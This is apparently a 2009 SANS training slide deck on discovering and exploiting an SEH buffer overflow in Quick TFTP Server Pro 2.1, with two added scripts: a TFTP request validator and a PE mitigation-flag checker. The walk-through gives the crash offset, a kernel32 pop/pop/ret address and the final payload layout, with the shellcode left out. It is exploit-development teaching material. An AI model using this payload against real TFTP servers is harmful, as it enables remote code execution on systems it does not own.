Custom Penetration Testing: Compromising a Vulnerability through Discovery and Custom Exploitation
Stephen Sims
Advanced Penetration Testing - 2009 SANS

Objectives
- Penetration Testing
- Precompiled Tools
- Targeting
- TFTP
- Testing a TFTP Server for Bugs
- Discovering the Bug
- Exploiting the TFTP Server
- Advanced Concepts

What is Penetration Testing?
- Process of testing a target environment for weaknesses
- More thorough than vulnerability scanning alone
- Validates findings by exploiting flaws
- Allows you to think like an attacker
- Various levels of interaction/depth

Types of Penetration Testing
- Black-Box Penetration Testing
  - No access to source code
  - No access provided to OS, architecture, etc.
  - More like an outsider attack scenario
  - More time consuming
- Crystal-Box Penetration Testing
  - Tester given source code, system & network architecture and/or privileged system access
  - More thorough than black-box testing
  - Cost effective

Precompiled Tools
- Pros
  - Can quickly be used
  - Customer support
  - Broad user community
  - Often allow custom scripts or modules
- Cons
  - Limited in scope
  - Only discover and test known vulnerabilities
  - Skilled attackers are not relying solely on them
  - Precompiled tools offer a sense of complacency
  - Do not perform code coverage or do deep fuzzing

Targeting: General Steps
1. Determine Target Application and Operating System
2. Obtain a Copy of the Application
3. Analyze RFC and Communications Protocols
4. Discover and Record a Crash Condition
5. Analyze Crash Condition for Exploitation Opportunities

1) Determine Target Application and Operating System
- What application/service are you analyzing?
- What OS is it available for? Which one(s) are you interested in?
- What services does the application start up?
  - There may be several
  - Scanning may help
  - Analyze documentation and code if possible
- Are the services proprietary or standards-based?
  - Proprietary often offer a lot of new opportunities

2) Obtain a Copy of the Application
- Create a lab environment and install the application
  - Use the OS you are targeting
  - Utilize Virtual Machines
  - Create snapshots prior to installation
  - Install monitoring tools
- Attempt to obtain the source code
  - Code analysis is often more complex than behavioral analysis, but valuable

3) Analyze RFC and Communications Protocols
- Is documentation available?
- Programmers should follow RFCs
  - Search the RFC for potential options and fields that may contain opportunities to cause a fault
- Understand each aspect of the protocols used by the application and the behavior associated with each
- Is architectural documentation available?

4) Discover and Record a Crash Condition
- Are you properly monitoring?
  - Sniffers to record packets sent to the application
    - Wireshark/Tshark, tcpdump, etc.
    - Packets can be recorded and replayed
  - Debuggers to record application behavior while receiving/handling data
    - OllyDbg, Immunity Debugger, WinDbg
  - OS monitoring tools to monitor health
    - ProcMon, RegMon, FileMon, RegShot, etc.
- The condition must be repeatable

5) Analyze Crash Condition for Exploitation Opportunities
- What is happening during the crash?
- Analyze the status of each register
  - Are registers holding or pointing to strange values? e.g. 0x41414141 if inputting A's
- Is the Return Pointer or SEH chain being overwritten?
  - Analyze the stack segment and monitor ESP/EBP
- Are heap pointers being overwritten?
  - Analyze dynamic memory allocations and behavior
- There's way more to analyze, but this is a start!

Targeting (2)
- Our goal is to discover and exploit a Windows program vulnerability!
- The techniques we'll cover are applicable to any target or service
- We're targeting a TFTP service
  - Must understand how the protocol works
  - Developers should follow RFCs
  - We can leverage the RFC as well
- Could use fuzzing to automate bug discovery

Our TFTP Target
- Quick TFTP Server Pro Version 2.1
  - Vulnerable to a stack-based buffer overflow
  - Can exploit by overwriting the Structured Exception Handling (SEH) chain
  - Allows for DoS or code execution as System
- TFTP Server published by TallSoft
- Vulnerability discovered in 2008 by Mati Aharoni of Offensive Security

TFTP
- Trivial File Transfer Protocol (TFTP)
- Simple protocol for transferring files over a network
- Clear-text protocol using UDP port 69
- Used for transferring files by network devices, VoIP phones and other client-server programs

TFTP Behavior
- Connection request is combined with either a read or write request
- Blocks of data are sent in a fixed 512-byte size
- Each block must be acknowledged for error control
- A block of less than 512 bytes indicates the end of the stream

TFTP Behavior (2)
- The first two bytes of a TFTP header indicate the request type and format
  - \x00\x01 indicates a read request
  - \x00\x02 indicates a write request
  - \x00\x03 indicates a data block
  - \x00\x04 is an acknowledgement
  - \x00\x05 indicates an error
  - \x00\x06 is an optional acknowledgement

TFTP Behavior (3)
- Read and Write request format:
  - \x00\x01 for read, \x00\x02 for write
  - File Name
  - Null byte - \x00
  - Mode - Binary, ASCII or Mail
  - Null byte - \x00
- Example:

    Request | Type     | File Name | Null | Mode  | Null
    Read    | \x00\x01 | file1.txt | \x00 | Octet | \x00

Hacking Quick TFTP Server
- Quick TFTP Server Version 2.1
- Install tftpserver_setup.exe onto a Windows XP Virtual Machine
- Use the TFTP information just covered to help with the investigation
- Attempt to crash the TFTP server while running in a debugger
  - Create a custom script to start the testing
- Validate findings
- Attempt code execution

Tools We Need
- Programming/Scripting Language
  - Python, Perl, Ruby, C
- Debugger and Disassembler
  - OllyDbg, Immunity Debugger, IDA Pro
- Shellcode
  - Metasploit, Milw0rm, Custom
- An open mind!
  - Knowledge of OS controls, opcodes, tricks

Python
- Object-oriented, high-level programming language
- Very intuitive
- Very modular
- No manual compilation
- Plays well with other languages
  - C, C++, Jython, IronPython (.NET)
- Good debugging

Tool: OllyDbg
- Software debugger for Windows
- Author: Oleh Yuschuk
- Shareware!
- Binary code analysis
  - Register contents, procedures, API calls, patching, memory searching and more!

Hacking TFTP Hint #1
- Consider the format of TFTP requests for your script
  - We covered the order a few slides ago
- Read & Write requests are often the easiest to attack as they have variable fields
  - They start with \x00\x01 & \x00\x02
- The header format must be correct to trigger a valid response
- Command-line scripting is not always the best option
  - You may want to write a script

Hacking TFTP Hint #2
- Where could a buffer overflow condition exist?
  - Try the request type field, file name and/or the mode
  - Don't forget the nulls to terminate!
- Make sure you're watching the right thread in OllyDbg
  - Processes have multiple threads on Windows

Hacking TFTP Hint #3
- The easiest way is to use Python or Perl to open a socket and send your script

    import socket
    import sys

    target = "IP ADDRESS"   # Enter the right IP here
    port = 69               # Port for TFTP
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)   # UDP socket, as TFTP uses UDP
    cmd = b"A" * 10         # Enter the number of A's to send
    data = b"\x00\x01" + cmd   # Modify this line to format your packet
    s.sendto(data, (target, port))

Quick TFTP Walk-Through
- Start Quick TFTP Server with Olly
  - Ignore entry point messages
  - Press F9 once loaded
  - Click OK on the demo pop-up

Quick TFTP Walk-Through (2)
- This may be possible via command line, but we need a script!
- Don't forget the formatting of TFTP read and write requests:

    Request | Type     | File Name | Null | Mode  | Null
    Read    | \x00\x01 | file1.txt | \x00 | Octet | \x00

- The overflow is in the mode section!
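
The following Python validator is an added example and is not code from the slides or from Quick TFTP Server. It parses the read/write request layout from the TFTP Behavior (3) table and enforces the bounds a hardened server or an IDS rule would apply to exactly the field this walk-through identifies, the mode. The 255-byte filename limit and 8-byte mode limit are assumed bounds (RFC 1350 sets none); the sample datagrams, including one whose mode field is 1060 bytes of A's like the crash case, are constructed rather than captured traffic.

```python
import struct

# Opcodes from RFC 1350 (the TFTP Behavior (2) slide lists them as \x00\x01 .. \x00\x06)
OPCODES = {1: "RRQ", 2: "WRQ", 3: "DATA", 4: "ACK", 5: "ERROR", 6: "OACK"}
VALID_MODES = {b"netascii", b"octet", b"mail"}
MAX_FILENAME = 255   # assumed bound for this validator; RFC 1350 sets no limit
MAX_MODE = 8         # longest legal mode string, "netascii", is 8 bytes


class TftpParseError(ValueError):
    """Raised for any request that does not match the RRQ/WRQ layout or the bounds above."""


def parse_request(datagram):
    """Parse an RRQ/WRQ datagram into (type, filename, mode); reject anything malformed."""
    if len(datagram) < 4:
        raise TftpParseError("datagram too short for a TFTP request")
    (opcode,) = struct.unpack("!H", datagram[:2])
    if opcode not in (1, 2):
        raise TftpParseError("opcode %d is not a read or write request" % opcode)
    # A well-formed body is <filename>\x00<mode>\x00, so splitting on NUL must give
    # exactly [filename, mode, b""]; anything else is a missing or extra terminator.
    fields = datagram[2:].split(b"\x00")
    if len(fields) != 3 or fields[2] != b"":
        raise TftpParseError("request body is not two NUL-terminated strings")
    filename, mode = fields[0], fields[1]
    if not 1 <= len(filename) <= MAX_FILENAME:
        raise TftpParseError("filename length %d outside 1..%d" % (len(filename), MAX_FILENAME))
    # Length is checked first so an oversized field is reported as such, not as an unknown mode.
    if len(mode) > MAX_MODE or mode.lower() not in VALID_MODES:
        raise TftpParseError("mode field of %d bytes is not netascii/octet/mail" % len(mode))
    try:
        return OPCODES[opcode], filename.decode("ascii"), mode.decode("ascii").lower()
    except UnicodeDecodeError:
        raise TftpParseError("non-ASCII bytes in filename")


def build_request(opcode, filename, mode="octet"):
    """Lay out a request exactly as the slide's table does: opcode, filename, NUL, mode, NUL."""
    return (struct.pack("!H", opcode) + filename.encode("ascii") + b"\x00"
            + mode.encode("ascii") + b"\x00")


def inspect(datagram):
    """Return ("ok", parsed) or ("reject", reason): the verdict a TFTP proxy or IDS rule would log."""
    try:
        return "ok", parse_request(datagram)
    except TftpParseError as exc:
        return "reject", str(exc)


# Constructed sample datagrams (not captured traffic).
SAMPLES = {
    "normal_read": build_request(1, "file1.txt", "octet"),
    "oversized_mode": build_request(1, "blah", "A" * 1060),   # same shape as the crash case
    "missing_terminator": b"\x00\x02" + b"file1.txt\x00octet",
    "bad_opcode": b"\x00\x09" + b"x\x00octet\x00",
}

if __name__ == "__main__":
    for name, dgram in SAMPLES.items():
        print("%-20s %s" % (name, inspect(dgram)))
```

Running the script prints one verdict per sample; only normal_read is accepted, and the oversized mode is rejected by the length check before any copy of the field takes place, which is the property a fixed server would need.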

Quick TFTP Walk-Through (3)
- Write a Python script that connects to the TFTP server with 1000 A's
- No crash in Olly

Quick TFTP Walk-Through (4)
- 1060 A's
- EIP is 41414141
- Success! Olly has paused

Quick TFTP Walk-Through (5)
- What are we overwriting?
- We overwrote the SEH chain!
- Let's do some math to see where the overflow is occurring

Quick TFTP Walk-Through (6)
- Subtracting 41 A's should take us to the SEH handler
- Let's give it a try by setting:

    cmd = "A"*1023 + "\xde\xc0\xad\xde"

- We control EIP at 1023 bytes!

Quick TFTP Walk-Through (7)
- We now need to find a valid pop/pop/ret instruction
  - Use the findjmp tool and experiment
  - 0x77ec9cac is one I chose from kernel32.dll for XP SP1
- Remember that you must compensate for SafeSEH if hacking XP SP2/SP3
- Also remember that not every pop/pop/ret address will work. You gotta dig.

Quick TFTP Walk-Through (8)
- Finalizing our script:

    cmd = "A"*1019 + "\xeb\x06\x90\x90" + "\xac\x9c\xec\x77" + "\x90"*4 + sc   # sc holds the shellcode (not shown on the slide)
    data = "\x00\x01" + "blah" + "\x00" + cmd + "\x00"

- "\xeb\x06\x90\x90" and "\xac\x9c\xec\x77": our jmp and pointer
- "\x90"*4 and sc: our NOPs and shellcode

Advanced Concepts
- Depending on the OS version, a number of controls have been added
  - SafeSEH: protects SEH pointers against overwrites
  - ASLR: randomizes locations of libraries and memory segments
  - DEP: prevents code execution on the stack and heap
  - Security Cookies: pushes unique values onto the stack and heap during allocations which are checked upon exit or free
- Every byte in memory is a potential full or partial opcode
  - As long as the segment is executable
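
As an added example that is not part of the deck, the Python script below reads the DllCharacteristics word from a PE image's optional header and reports whether the image opts in to two of the controls listed above: ASLR (IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE, 0x0040) and DEP (NX_COMPAT, 0x0100), plus the NO_SEH bit (0x0400). SafeSEH's registered-handler table lives in the Load Config directory, which this script does not parse, so NO_SEH is the only SEH-related signal it gives. The make_fake_pe helper builds a header-only image so the checks run offline; it is a constructed stand-in, not a real executable, and the script name in the usage note is assumed.

```python
import struct
import sys

# IMAGE_DLLCHARACTERISTICS_* bits from the PE/COFF specification
DYNAMIC_BASE = 0x0040  # image may be relocated at load time: ASLR opt-in
NX_COMPAT = 0x0100     # image declares itself DEP-compatible
NO_SEH = 0x0400        # image registers no SEH handlers at all
MITIGATION_BITS = {
    "ASLR (DYNAMIC_BASE)": DYNAMIC_BASE,
    "DEP (NX_COMPAT)": NX_COMPAT,
    "NO_SEH": NO_SEH,
}


def read_dll_characteristics(image):
    """Return the DllCharacteristics word from the optional header of a raw PE image."""
    if image[:2] != b"MZ":
        raise ValueError("not a DOS/PE image")
    (e_lfanew,) = struct.unpack_from("<I", image, 0x3C)
    if image[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("PE signature not found")
    file_header = e_lfanew + 4                      # IMAGE_FILE_HEADER, 20 bytes
    (opt_size,) = struct.unpack_from("<H", image, file_header + 16)
    optional = file_header + 20                     # IMAGE_OPTIONAL_HEADER
    (magic,) = struct.unpack_from("<H", image, optional)
    if magic not in (0x10B, 0x20B):                 # PE32 / PE32+
        raise ValueError("unknown optional header magic 0x%x" % magic)
    if opt_size < 72:
        raise ValueError("optional header too short to hold DllCharacteristics")
    # DllCharacteristics sits at offset 70 of the optional header in both PE32 and PE32+
    (dll_chars,) = struct.unpack_from("<H", image, optional + 70)
    return dll_chars


def mitigation_report(image):
    """Map each control the header records to True (opted in) or False."""
    dll_chars = read_dll_characteristics(image)
    return {name: bool(dll_chars & bit) for name, bit in MITIGATION_BITS.items()}


def make_fake_pe(dll_characteristics, pe32plus=False):
    """Construct a header-only PE image (not a real executable) so the checks can run offline."""
    dos = b"MZ" + b"\x00" * 58 + struct.pack("<I", 64)   # e_lfanew = 64
    machine = 0x8664 if pe32plus else 0x14C
    opt_size = 112 if pe32plus else 96                     # standard fields only, no data directories
    file_header = struct.pack("<HHIIIHH", machine, 0, 0, 0, 0, opt_size, 0x0102)
    optional = bytearray(opt_size)
    struct.pack_into("<H", optional, 0, 0x20B if pe32plus else 0x10B)
    struct.pack_into("<H", optional, 70, dll_characteristics)
    return dos + b"PE\x00\x00" + file_header + bytes(optional)


if __name__ == "__main__":
    if len(sys.argv) > 1:
        with open(sys.argv[1], "rb") as fh:
            image = fh.read()
    else:
        image = make_fake_pe(DYNAMIC_BASE | NX_COMPAT)   # constructed sample when no path is given
    for name, enabled in sorted(mitigation_report(image).items()):
        print("%-22s %s" % (name, "yes" if enabled else "no"))
```

Run it as `python pe_flags.py somefile.dll` (assumed script name) to check a module you intend to rely on, or with no argument to see the constructed sample. A module that reports DYNAMIC_BASE as "no" keeps a fixed load address, which is the property the pop/pop/ret search on the earlier slides depends on, so this is the first thing to look at when deciding which modules a server's process leaves unprotected.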

More Information
- Defeating the Stack Based Buffer Overflow Prevention Mechanism of Microsoft Windows 2003 Server, by David Litchfield: http://www.nextgenss.com/papers/defeating-w2k3-stackprotection.pdf (also at http://www.ngssoftware.com/papers/defeating-w2k3-stackprotection.pdf)
- Preventing the Exploitation of SEH Overwrites, by Skape (Matt Miller): http://www.uninformed.org/?v=5&a=2&t=pdf
- SEH Overwrites Simplified v1.01, by Aelphaeis Mangarae: http://www.milw0rm.com/papers/187
- Defeating Microsoft Windows XP SP2 Heap protection and DEP bypass, by Alexander Anisimov: http://www.maxpatrol.com/defeating-xpsp2-heap-protection.pdf
- Reliable Windows Heap Exploits, by Matt Conover & Oded Horovitz: http://www.slideshare.net/amiable_indian/reliable-windows-heap-exploits
- Third Generation Exploitation, by Halvar Flake: www.blackhat.com/presentations/win-usa-02/halvarflake-winsec02.ppt
- Heap Feng Shui in JavaScript, by Alexander Sotirov: http://www.blackhat.com/presentations/bh-europe-07/sotirov/presentation/bh-eu-07-sotirov-apr19.pdf
- Understanding Windows Shellcode, by Skape: http://www.hick.org/code/skape/papers/win32-shellcode.pdf

End
- Questions?
- SANS SEC709: Developing Exploits for Penetration Testers and Security Researchers
- stephen@deadlisting.com